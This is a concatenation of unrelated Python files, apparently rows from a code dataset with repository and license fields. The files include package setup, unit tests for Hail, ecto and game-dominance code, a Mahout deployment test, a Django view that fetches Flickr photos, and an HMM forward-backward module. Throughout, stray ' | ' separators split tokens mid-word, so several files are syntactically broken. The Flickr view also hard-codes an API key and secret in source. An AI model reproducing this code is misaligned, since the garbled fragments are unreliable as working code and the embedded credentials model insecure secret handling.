''' resets the page dictionary '''
mydict['error'] = self.base['error']
exclude = exclude if isinstance(exclude, list) else [exclude]
diffkeys = set(mydict) - set(self.base)
for key, val in mydict.items():
if key in diffkeys and (key not in exclude):
mydict[key] = '' if isinstance(val, str) else None
mydict['versions'] = self._versions
mydict['release'] = self._release
mydict['loggedin'] = self._logged_in
|
sanguillon/voprov | setup.py | Python | mit | 1,855 | 0.001078 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
fr | om codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.rst'), encod | ing='utf-8') as f:
readme = f.read()
requirements = [
'prov>=1.5.3',
]
test_requirements = [
'pydot>=1.2.0'
]
setup(
name='voprov',
version='0.0.2',
description='A library for IVOA Provenance Data Model supporting PROV-JSON, '
'PROV-XML and PROV-N',
long_description=readme,
author='Jean-Francois Sornay',
author_email='jeanfrancois.sornay@gmail.com',
url='https://github.com/sanguillon/voprov/',
packages=find_packages(),
include_package_data=True,
install_requires=requirements,
extras_require={
'dot': ['pydot>=1.2.0'],
},
license="MIT",
zip_safe=False,
keywords=[
'provenance', 'graph', 'model', 'VOPROV', 'provenance-dm', 'PROVENANCE-DM', 'PROV-JSON', 'JSON',
'PROV-XML', 'PROV-N'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: French',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Scientific/Engineering :: Information Analysis',
],
tests_require=test_requirements,
python_requires='>=2',
)
|
ethanrublee/ecto-release | test/scripts/test_If.py | Python | bsd-3-clause | 2,018 | 0.004955 | #!/usr/bin/env python
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY D | IRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, O | R PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import ecto
import ecto_test
def test_If():
plasm = ecto.Plasm()
g = ecto_test.Generate("Generator", step=1.0, start=1.0)
If = ecto.If(cell=g)
truer = ecto.TrueEveryN(n=3,count=3)
plasm.connect(truer['flag'] >> If['__test__']
)
plasm.execute(niter=27)
assert g.outputs.out == 9 #should have only called execute 9 times.
if __name__ == '__main__':
test_If()
|
danking/hail | hail/python/test/hail/matrixtable/test_grouped_matrix_table.py | Python | mit | 12,704 | 0.007006 | import unittest
import hail as hl
from ..helpers import *
setUpModule = startTestHailContext
tearDownModule = stopTestHailContext
class Tests(unittest.TestCase):
@staticmethod
def get_groupable_matrix():
rt = hl.utils.range_matrix_table(n_rows=100, n_cols=20)
rt = rt.annotate_globals(foo="foo")
rt = rt.annotate_rows(group1=rt['row_idx'] % 6,
group2=hl.Struct(a=rt['row_idx'] % 6,
b="foo"))
rt = rt.annotate_cols(group3=rt['col_idx'] % 6,
group4=hl.Struct(a=rt['col_idx'] % 6,
b="foo"))
return rt.annotate_entries(c=rt['row_idx'],
d=rt['col_idx'],
e="foo",
f=rt['group1'],
g=rt['group2']['a'],
h=rt['group3'],
i=rt['group4']['a'])
@staticmethod
def get_groupable_matrix2():
mt = hl.utils.range_matrix_table(4, 4)
mt = mt.annotate_globals(glob=5)
mt = mt.annotate_rows(r1=3)
mt = mt.annotate_cols(c1=3)
mt2 = hl.utils.range_matrix_table(4, 4)
mt2 = mt2.annotate_entries(x=mt2.row_idx + mt2.col_idx)
mt2 = mt2.annotate_rows(row_idx2=mt2.row_idx)
mt2 = mt2.annotate_cols(col_idx2=mt2.col_idx)
mt2 = mt2.annotate_globals(global_field=6)
return mt, mt2
def test_errors_caught_correctly(self):
from hail.expr.expressions import ExpressionException
mt = self.get_groupable_matrix()
self.assertRaises(ExpressionException, mt.group_rows_by, mt['group1'] + 1)
self.assertRaises(ExpressionException, mt.group_cols_by, mt['group1'])
self.assertRaises(ExpressionException, mt.group_cols_by, mt['group3'] + 1)
self.assertRaises(ExpressionException, mt.group_rows_by, mt['group3'])
self.assertRaises(ExpressionException, mt.group_rows_by, group3=mt['group1'])
self.assertRaises(ExpressionException, mt.group_cols_by, group1=mt['group3'])
self.assertRaises(ExpressionException, mt.group_rows_by, foo=mt['group1'])
self.assertRaises(ExpressionException, mt.group_cols_by, foo=mt['group3'])
a = mt.group_rows_by(group5=(mt['group2']['a'] + 1))
self.assertRaises(NotImplementedError, a.aggregate_cols, bar=hl.agg.sum(mt['col_idx'])) # cannot aggregate cols when grouped by rows
self.assertRaises(ExpressionException, a.aggregate_entries, group3=hl.agg.sum(mt['c'])) # duplicate column field
self.assertRaises(ExpressionException, a.aggregate_entries, group5=hl.agg.sum(mt['c'])) # duplicate row field
self.assertRaises(ExpressionException, a.aggregate_entries, foo=hl.agg.sum(mt['c'])) # duplicate globals field
self.assertRaises(ExpressionException, a.aggregate_rows, group3=hl.agg.sum(mt['row_idx'])) # duplicate column field
self.assertRaises(ExpressionException, a.aggregate_rows, group5=hl.agg.sum(mt['row_idx'])) # duplicate row field
self.assertRaises(ExpressionException, a.aggregate_rows, foo=hl.agg.sum(mt['row_idx'])) # duplicate globals field
self.assertRaises(ExpressionException, a.aggregate_rows, bar=mt['row_idx'] + hl.agg.sum(mt['row_idx'])) # expression has to have global indices
self.assertRaises(ExpressionException, a.aggregate_rows, bar=mt['col_idx'] + hl.agg.sum(mt['row_idx'])) # expression has to have global indices
self.assertRaises(ExpressionException, a.aggregate_rows, bar=hl.agg.sum(mt['c'])) # aggregation scope is rows only - entry field
self.assertRaises(ExpressionException, a.aggregate_rows, bar=hl.agg.sum(mt['col_idx'])) # aggregation scope is rows only - column field
b = mt.group_cols_by(group5=(mt['group4']['a'] + 1))
self.assertRaises(NotImplementedError, b.aggregate_rows, bar=hl.agg.sum(mt['row_idx'])) # cannot aggregate rows when grouped by cols
self.assertRaises(ExpressionException, b.aggregate_entries, group1=hl.agg.sum(mt['c'])) # duplicate row field
self.assertRaises(ExpressionException, b.aggregate_entries, group5=hl.agg.sum(mt['c'])) # duplicate column field
self.assertRaises(ExpressionException, b.aggregate_entries, foo=hl.agg.sum(mt['c'])) # duplicate globals field
self.assertRaises(ExpressionException, b.aggregate_cols, group1=hl.agg.sum(mt['col_idx'])) # duplicate row field
self.assertRaises(ExpressionException, b.aggregate_cols, group5=hl.agg.sum(mt['col_idx'])) # duplicate column field
self.assertRaises(ExpressionException, b.aggregate_cols, foo=hl.agg.sum(mt['col_idx'])) # duplicate globals field
self.assertRaises(ExpressionException, b.aggregate_cols, bar=mt['col_idx'] + hl.agg.sum(mt['col_idx'])) # expression has to have global indices
self.assertRaises(ExpressionException, b.aggregate_cols, bar=mt[ | 'row_idx'] + hl.agg.sum(mt['col_idx'])) # expression has to have global indices
self.assertRaises(ExpressionException, b.aggregate_cols, bar=hl.agg.sum(mt['c'])) # aggregation scope is cols only - entry field
self.assertRaises(ExpressionException, b.aggregate_cols, bar=hl.agg.sum(mt['row_idx'])) # aggregation scope is cols onl | y - row field
c = mt.group_rows_by(group5=(mt['group2']['a'] + 1)).aggregate_rows(x=hl.agg.count())
self.assertRaises(ExpressionException, c.aggregate_rows, x=hl.agg.count()) # duplicate field
d = mt.group_cols_by(group5=(mt['group4']['a'] + 1)).aggregate_cols(x=hl.agg.count())
self.assertRaises(ExpressionException, d.aggregate_cols, x=hl.agg.count()) # duplicate field
def test_fields_work_correctly(self):
mt = self.get_groupable_matrix()
a = mt.group_rows_by(mt['group1']).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(a.count_rows(), 6)
self.assertTrue('group1' in a.row_key)
b = mt.group_cols_by(mt['group3']).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(b.count_cols(), 6)
self.assertTrue('group3' in b.col_key)
def test_nested_fields_work_correctly(self):
mt = self.get_groupable_matrix()
a = mt.group_rows_by(mt['group2']['a']).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(a.count_rows(), 6)
self.assertTrue('a' in a.row_key)
b = mt.group_cols_by(mt['group4']['a']).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(b.count_cols(), 6)
self.assertTrue('a' in b.col_key)
def test_named_fields_work_correctly(self):
mt = self.get_groupable_matrix()
a = mt.group_rows_by(group5=(mt['group2']['a'] + 1)).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(a.count_rows(), 6)
self.assertTrue('group5' in a.row_key)
b = mt.group_cols_by(group5=(mt['group4']['a'] + 1)).aggregate(c=hl.agg.sum(mt['c']))
self.assertEqual(b.count_cols(), 6)
self.assertTrue('group5' in b.col_key)
def test_joins_work_correctly(self):
mt, mt2 = self.get_groupable_matrix2()
col_result = (mt.group_cols_by(group=mt2.cols()[mt.col_idx].col_idx2 < 2)
.aggregate(sum=hl.agg.sum(mt2[mt.row_idx, mt.col_idx].x + mt.glob) + mt.glob - 15)
.drop('r1'))
col_expected = (
hl.Table.parallelize(
[{'row_idx': 0, 'group': True, 'sum': 1},
{'row_idx': 0, 'group': False, 'sum': 5},
{'row_idx': 1, 'group': True, 'sum': 3},
{'row_idx': 1, 'group': False, 'sum': 7},
{'row_idx': 2, 'group': True, 'sum': 5},
{'row_idx': 2, 'group': False, 'sum': 9},
{'row_idx': 3, 'group': True, 'sum': 7},
{'row_idx': 3, 'group': False, 'sum': 11}],
hl.tstruct(row_idx=hl.tint32, group=hl.tbool, sum=hl.tint64)
).annotate_globals(glob=5).key_by('row_idx', 'group')
)
self.assertTrue(col_result.entries()._same(col_expected))
row_result = (mt. |
welikecloud/bigtop | bigtop-packages/src/charm/mahout/layer-mahout/tests/01-mahout-test.py | Python | apache-2.0 | 2,393 | 0.000418 | #!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# l | imitations under the License.
import unittest
import amulet
class TestDeploy(unittest.TestCase):
    """Deployment and smoke test for Apache Bigtop Mahout."""

    @classmethod
    def setUpClass(cls):
        cls.d = amulet.Deployment(series='xenial')

        # Services in the deployment; a None charm means "use the default
        # charm with the same name as the service".
        services = [
            ('mahout', None),
            ('client', 'hadoop-client'),
            ('namenode', 'hadoop-namenode'),
            ('resourcemanager', 'hadoop-resourcemanager'),
            ('slave', 'hadoop-slave'),
            ('plugin', 'hadoop-plugin'),
        ]
        for service, charm in services:
            if charm is None:
                cls.d.add(service)
            else:
                cls.d.add(service, charm=charm)

        # Wire up the Hadoop cluster and attach Mahout to the client.
        relations = [
            ('plugin:hadoop-plugin', 'client:hadoop'),
            ('plugin:namenode', 'namenode:namenode'),
            ('plugin:resourcemanager', 'resourcemanager:resourcemanager'),
            ('slave:namenode', 'namenode:datanode'),
            ('slave:resourcemanager', 'resourcemanager:nodemanager'),
            ('namenode:namenode', 'resourcemanager:namenode'),
            ('mahout:mahout', 'client:mahout'),
        ]
        for left, right in relations:
            cls.d.relate(left, right)

        cls.d.setup(timeout=3600)
        cls.d.sentry.wait_for_messages({"mahout": "ready"}, timeout=3600)
        cls.mahout = cls.d.sentry['mahout'][0]

    def test_mahout(self):
        """Validate Mahout by running the smoke-test action."""
        uuid = self.mahout.run_action('smoke-test')
        result = self.d.action_fetch(uuid, full_output=True)
        # The action reports status=completed on success.
        if result['status'] != "completed":
            self.fail('Mahout smoke-test failed: %s' % result)
if __name__ == '__main__':
    # Allow running this smoke test directly, outside a test runner.
    unittest.main()
|
xurichard/mysite | photos/views.py | Python | mit | 753 | 0.022576 | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from .models import *
import requests
import json
# Flickr API credentials for the public photo feed.
# NOTE(review): secrets are hard-coded in source; consider moving them to
# Django settings or environment variables.
user_id = '139169754@N02'
api_key = '41dd3aff041c00c52febdef9786a9ca0'  # restored: literal was broken by a stray separator
api_secret = '0f5a3b5047f760f7'
def index(request):
    """Render the gallery page with the user's public Flickr photo URLs.

    Queries the Flickr REST API for ``user_id``'s public photos and passes
    the medium-size (``url_z``) links to the template.  If the HTTP request
    fails, the photo list is simply left empty.
    """
    context = {}
    context['photos'] = []
    method = 'flickr.people.getPublicPhotos'
    query = ('https://api.flickr.com/services/rest/'
             '?&method=%s&api_key=%s&user_id=%s&format=json&nojsoncallback=1'
             % (method, api_key, user_id))
    query += '&extras=url_z'  # ask Flickr to include the medium-640 URL
    response = requests.get(query)
    if response.ok:
        # Was a garbled `json.loads(response. | text)`; Response.json() is
        # the equivalent, idiomatic decode.
        data = response.json()
        for link in data['photos']['photo']:
            context['photos'].append(str(link['url_z']))
    return render(request, 'photos/index.html', context)
|
marksantesson/xmldump | test_utils.py | Python | apache-2.0 | 2,650 | 0.017736 | # cd c:\Docs\Code\lawn
# kr *.py -r -c "python manage.py test test_utils"
import logging
import os
from django.test import TestCase
from utils import LoggingFilterContext, TemporaryFileContext
class TestLoggingFilter(TestCase):
    """Tests for LoggingFilterContext and its annotate* decorators."""

    def test_filtering(self):
        """A rejecting outer filter keeps records from inner filters."""
        calls = list()

        def test_fn(record):
            calls.append(record)

        # Outter filters are checked first.
        with LoggingFilterContext(lambda record: False):
            with LoggingFilterContext(test_fn):
                logging.error('pass')
        with LoggingFilterContext(lambda record: True):
            with LoggingFilterContext(test_fn):
                logging.error('fail')
        # assertEquals is a deprecated alias (removed in Python 3.12).
        self.assertEqual(['fail'], [x.msg for x in calls])

    def test_filtering_annotate(self):
        """annotate() attaches a logging_filter applying the predicate."""
        calls = list()

        @LoggingFilterContext.annotate(lambda rec: rec.msg == 'pass')
        def test_fn(record):
            calls.append(record)

        with test_fn.logging_filter:
            with LoggingFilterContext(test_fn):
                # logging.warn is a deprecated alias of logging.warning.
                logging.warning('pass')
        with test_fn.logging_filter:
            with LoggingFilterContext(test_fn):
                logging.warning('fail')
        self.assertEqual(['pass'], [x.msg for x in calls])

    def test_filtering_annotate_regex(self):
        """annotate_regex() keeps only records whose message matches."""
        calls = list()

        @LoggingFilterContext.annotate_regex('.*pass$')
        def test_fn(record):
            calls.append(record)

        with test_fn.logging_filter:
            with LoggingFilterContext(test_fn):
                logging.warning('pass')
        with test_fn.logging_filter:
            with LoggingFilterContext(test_fn):
                logging.warning('fail')
        self.assertEqual(['pass'], [x.msg for x in calls])

    def test_filtering_annotate_not_regex(self):
        """annotate_not_regex() drops records whose message matches."""
        calls = list()

        @LoggingFilterContext.annotate_not_regex('.*fail$')
        def test_fn(record):
            calls.append(record)

        with test_fn.logging_filter:
            with LoggingFilterContext(test_fn):
                logging.warning('pass')
        with test_fn.logging_filter:
            with LoggingFilterContext(test_fn):
                logging.warning('fail')
        self.assertEqual(['pass'], [x.msg for x in calls])
class TestTemporaryFileContext(TestCase):
    """Tests for TemporaryFileContext."""

    def test_file_is_removed(self):
        """The file exists with the given contents inside the context and
        is removed when the context exits."""
        contents = 'asd'
        with TemporaryFileContext(contents) as tempfile:
            fname = tempfile.fileName()
            self.assertTrue(os.access(fname, os.R_OK))
            # assertEquals is a deprecated alias (removed in Python 3.12).
            self.assertEqual(contents, open(fname).read())
        self.assertFalse(os.access(fname, os.R_OK))
|
ramon-astudillo/lxmls-toolkit | lxmls/sequences/bak/forward_backward.py | Python | mit | 8,281 | 0.00157 | import numpy as np
# ----------
# Computes the forward backward trellis for a given sequence.
# N - Length of sequence
# H - Number of hidden states
# Receives:
# Node potentials (N,H) vector
# Edge potentials (N-1,H,H)
#
# Emission probabilities: (length, num_states) array
# Initial probabilities: (num_states) array
# Transition probabilities: (length, num_states+1, num_states) array
#
# OR
#
# Transition probabilities: (length-1, num_states, num_states) array
# Final probabilities: (num_states) array
# ----------
def run_forward(initial_scores, transition_scores, final_scores, emission_scores):
    """Run the forward algorithm over a chain of scores.

    Parameters
    ----------
    initial_scores : (num_states,) array of initial-state scores.
    transition_scores : (length-1, num_states, num_states) array; entry
        [pos, cur, prev] scores the move prev -> cur into position pos+1.
    final_scores : (num_states,) array of final-state scores.
    emission_scores : (length, num_states) array of emission scores.

    Returns
    -------
    (likelihood, forward) : the total sequence score and the
        (length, num_states) forward-variable trellis.
    """
    length = np.size(emission_scores, 0)  # Length of the sequence.
    num_states = np.size(initial_scores)  # Number of states.

    # Forward variables.
    forward = np.zeros([length, num_states])

    # Initialization.
    forward[0, :] = emission_scores[0, :] * initial_scores

    # Forward loop (xrange -> range: valid on both Python 2 and 3).
    for pos in range(1, length):
        for current_state in range(num_states):
            forward[pos, current_state] = \
                np.sum(forward[pos - 1, :] * transition_scores[pos - 1, current_state, :])
            forward[pos, current_state] *= emission_scores[pos, current_state]

    # Termination.
    likelihood = np.sum(forward[length - 1, :] * final_scores)
    return likelihood, forward
def run_backward(initial_scores, transition_scores, final_scores, emission_scores):
    """Run the backward algorithm over a chain of scores.

    Arguments have the same shapes as in :func:`run_forward`.

    Returns
    -------
    (likelihood, backward) : the total sequence score and the
        (length, num_states) backward-variable trellis.  The likelihood
        must agree with the one computed by the forward pass.
    """
    length = np.size(emission_scores, 0)  # Length of the sequence.
    num_states = np.size(initial_scores)  # Number of states.

    # Backward variables.
    backward = np.zeros([length, num_states])

    # Initialization.
    backward[length - 1, :] = final_scores

    # Backward loop (xrange -> range: valid on both Python 2 and 3).
    for pos in range(length - 2, -1, -1):
        for current_state in range(num_states):
            backward[pos, current_state] = np.sum(
                backward[pos + 1, :] *
                transition_scores[pos, :, current_state] *
                emission_scores[pos + 1, :])

    # Termination: fold in the initial scores and first emissions.
    likelihood = np.sum(backward[0, :] * initial_scores * emission_scores[0, :])
    return likelihood, backward
def forward_backward(initial_scores, transition_scores, final_scores, emission_scores):
    """Compute both forward and backward trellises for a sequence.

    Returns ``(forward, backward)``, each of shape (length, num_states).
    The likelihood from each pass is printed as a sanity check; the two
    values should agree.
    """
    likelihood, forward = run_forward(initial_scores, transition_scores,
                                      final_scores, emission_scores)
    # Python 2 `print` statements replaced with a form valid on 2 and 3.
    print('Likelihood = %s' % likelihood)

    likelihood, backward = run_backward(initial_scores, transition_scores,
                                        final_scores, emission_scores)
    print('Likelihood = %s' % likelihood)
    return forward, backward
# ----------
# Computes the forward backward trellis for a given sequence and node and edge potentials
# N - Length of sequence
# H - Number of hidden states
# Receives:
# Node potentials (N,H) vector
# Edge potentials (N-1,H,H)
# ----------
# def forward_backward(node_potentials,edge_potentials):
# H,N = node_potentials.shape
# forward = np.zeros([H,N],dtype=float)
# backward = np.zeros([H,N],dtype=float)
# forward[:,0] = node_potentials[:,0]
# # Forward loop
# for pos in xrange(1,N):
# for current_state in xrange(H):
# for prev_state in xrange(H):
# forward_v = forward[prev_state,pos-1]
# trans_v = edge_potentials[prev_state,current_state,pos-1]
# prob = forward_v*trans_v
# forward[current_state,pos] += prob
# forward[current_state,pos] *= node_potentials[current_state,pos]
# # Backward loop
# backward[:,N-1] = 1
# for pos in xrange(N-2,-1,-1):
# for current_state in xrange(H):
# prob = 0
# for next_state in xrange(H):
# back = backward[next_state,pos+1]
# trans = edge_potentials[current_state,next_state,pos];
# observation = node_potentials[next_state,pos+1];
# prob += trans * observation * back;
# backward[current_state,pos] = prob
# # sanity_check_forward_backward(forward,backward)
# return forward,backward
# def forward_backward_trans_probs(node_potentials,transitions_probs):
# H,N = node_potentials.shape
# forward = np.zeros([H,N],dtype=float)
# backward = np.zeros([H,N],dtype=float)
# forward[:,0] = node_potentials[:,0]
# # Forward loop
# for pos in xrange(1,N):
# for current_state in xrange(H):
# for prev_state in xrange(H):
# forward_v = forward[prev_state,pos-1]
# trans_v = transitions_probs[current_state,prev_state]
# prob = forward_v*trans_v
# forward[current_state,p | os] += prob
# forward[current_state,pos] *= node_potentials[current_state,pos]
# # Backward loop
# backward[:,N-1] = 1
# for pos in xrange(N-2,-1,-1):
# for current_state in xrange(H):
# prob = 0
# for next_state in xrange(H):
# | back = backward[next_state,pos+1]
# trans = transition_probs[next_state,current_state];
# observation = node_potentials[next_state,pos+1];
# prob += trans * observation * back;
# backward[current_state,pos] = prob
# # sanity_check_forward_backward(forward,backward)
# return forward,backward
# ----------
# For every position - pos the sum_states forward(pos,state)*backward(pos,state) = Likelihood
# ----------
def sanity_check_forward_backward(forward, backward):
    """Check that sum_s forward[pos, s] * backward[pos, s] is the same
    (namely, the sequence likelihood) at every position.

    A mismatch between positions is reported on stdout.  The source line
    was truncated in this copy; the message format is reconstructed as
    the obvious "%f - %f" pair of mismatching values.
    """
    N, H = forward.shape
    likelihood = np.zeros([N, 1])
    for pos in range(N):
        aux = 0
        for current_state in range(H):
            aux += forward[pos, current_state] * backward[pos, current_state]
        likelihood[pos] = aux
        for i in range(pos):
            if abs(aux - likelihood[i]) > 0.001:
                print('Likelihood for pos %i and pos %i mismatch: %f - %f'
                      % (pos, i, aux, likelihood[i]))
abhishek8gupta/sp17-i524 | project/S17-IO-3017/code/projectearth/testfile.py | Python | apache-2.0 | 616 | 0.008117 | import os
class classFileWrite:
fileobj = None
directory = "./benchmark"
fpath = directory + "/test.txt"
de | f __init__(self):
if not os.path.exists(self.directory):
os.makedirs(self.directory)
self.openfile()
def openfile(self):
self.fileobj = open(self.fpath, "a")
def writeline(self):
line = "=" * 60
line=line+"\n"
self.fileobj.write(line)
| def writelog(self,logstr=""):
self.fileobj.seek(0,0)
logstr = logstr+"\n"
self.fileobj.write(logstr)
def closefile(self):
self.fileobj.close()
|
yackj/GameAnalysis | test/dominance_test.py | Python | apache-2.0 | 5,333 | 0 | import json
import numpy as np
from gameanalysis import dominance
from gameanalysis import gamegen
from gameanalysis import gameio
from gameanalysis import rsgame
def test_weakly_dominated():
    """Weak-dominance detection on full 2-player, 2-strategy games."""
    # Each case: (profiles, payoffs, expected weakly-dominated mask).
    cases = [
        ([[2, 0], [1, 1], [0, 2]],
         [[2, 0], [2, 1], [0, 1]],
         [False, True]),
        ([[2, 0], [0, 2]],
         [[2, 0], [0, 2]],
         [False, False]),
        ([[2, 0], [1, 1], [0, 2]],
         [[2, 0], [2, 1], [0, 2]],
         [False, True]),
        ([[2, 0], [1, 1], [0, 2]],
         [[2, 0], [2, 2], [0, 2]],
         [True, True]),
    ]
    for profiles, payoffs, expected in cases:
        game = rsgame.game(2, 2, profiles, payoffs)
        mask = dominance.weakly_dominated(game)
        assert np.all(mask == expected)
def test_weakly_dominated_conditional():
    """Conditional vs. unconditional weak dominance on a partial game."""
    game = rsgame.game(2, 2, [[0, 2], [1, 1]], [[0, 1], [1, 1]])
    # Conditional (default) only uses observed profiles.
    assert np.all(dominance.weakly_dominated(game) == [True, False])
    # Unconditionally, both strategies come out weakly dominated.
    assert np.all(dominance.weakly_dominated(game, False) == [True, True])
def test_strictly_dominated():
    """Strict-dominance detection on 2-player, 2-strategy games."""
    # Each case: (profiles, payoffs, expected strictly-dominated mask).
    cases = [
        ([[2, 0], [1, 1], [0, 2]],
         [[2, 0], [2, 1], [0, 1]],
         [False, True]),
        ([[2, 0], [0, 2]],
         [[2, 0], [0, 1]],
         [False, False]),
        ([[2, 0], [1, 1], [0, 2]],
         [[2, 0], [2, 2], [0, 1]],
         [False, False]),
    ]
    for profiles, payoffs, expected in cases:
        game = rsgame.game(2, 2, profiles, payoffs)
        mask = dominance.strictly_dominated(game)
        assert np.all(mask == expected)
def test_strictly_dominated_conditional():
    """Conditional (default) vs. unconditional strict dominance."""
    profiles = [
        [0, 2],
        [1, 1],
    ]
    payoffs = [
        [0, 1],
        [2, 1],
    ]
    game = rsgame.game(2, 2, profiles, payoffs)
    wd = dominance.strictly_dominated(game)
    assert np.all(wd == [False, False])
    wd = dominance.strictly_dominated(game, False)
    assert np.all(wd == [False, True])

    profiles = [
        [2, 0],
        [1, 1],
    ]
    payoffs = [
        [2, 0],
        [2, 1],
    ]
    game = rsgame.game(2, 2, profiles, payoffs)
    wd = dominance.strictly_dominated(game)
    assert np.all(wd == [False, True])

    profiles = [
        [2, 0],
        [1, 1],
    ]
    payoffs = [
        [2, 0],
        [2, 2],
    ]
    game = rsgame.game(2, 2, profiles, payoffs)
    wd = dominance.strictly_dominated(game)
    assert np.all(wd == [False, False])

    profiles = [
        [2, 0],
        [0, 2]
    ]
    payoffs = [
        [2, 0],
        [0, 1],
    ]
    # The next two lines were garbled by stray separators in the source
    # ('payof | fs' and 'F | alse'); restored to valid Python.
    game = rsgame.game(2, 2, profiles, payoffs)
    wd = dominance.strictly_dominated(game, False)
    assert np.all(wd == [False, False])
def test_never_best_response():
    """Unconditional never-best-response on full 2x2 symmetric games."""
    profiles = [[2, 0], [1, 1], [0, 2]]
    # Each case: (payoffs, expected never-best-response mask).
    cases = [
        ([[1, 0], [2, 2], [0, 1]], [False, False]),
        ([[2, 0], [2, 2], [0, 2]], [False, False]),
        ([[1, 0], [2, 2], [0, 3]], [True, False]),
    ]
    for payoffs, expected in cases:
        game = rsgame.game(2, 2, profiles, payoffs)
        mask = dominance.never_best_response(game, False)
        assert np.all(mask == expected)
def test_never_best_response_conditional():
    """Conditional never-best-response on partial games."""
    # Each case: (profiles, payoffs, expected mask).
    cases = [
        ([[2, 0], [0, 2]], [[1, 0], [0, 1]], [False, False]),
        ([[1, 1], [0, 2]], [[2, 2], [0, 3]], [True, False]),
    ]
    for profiles, payoffs, expected in cases:
        game = rsgame.game(2, 2, profiles, payoffs)
        mask = dominance.never_best_response(game, True)
        assert np.all(mask == expected)
def test_travellers_dilemma():
    """Iterated weak dominance reduces traveller's dilemma to one strategy."""
    game = gamegen.travellers_dilemma(max_value=6)
    mask = dominance.iterated_elimination(game, 'weakdom')
    expected = [True] + [False] * 4
    assert np.all(mask == expected)
def test_known_fail_case():
    """Regression: 'neverbr' elimination must not crash on this game."""
    with open('test/hard_nash_game_1.json') as handle:
        game, _ = gameio.read_game(json.load(handle))
    dominance.iterated_elimination(game, 'neverbr')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.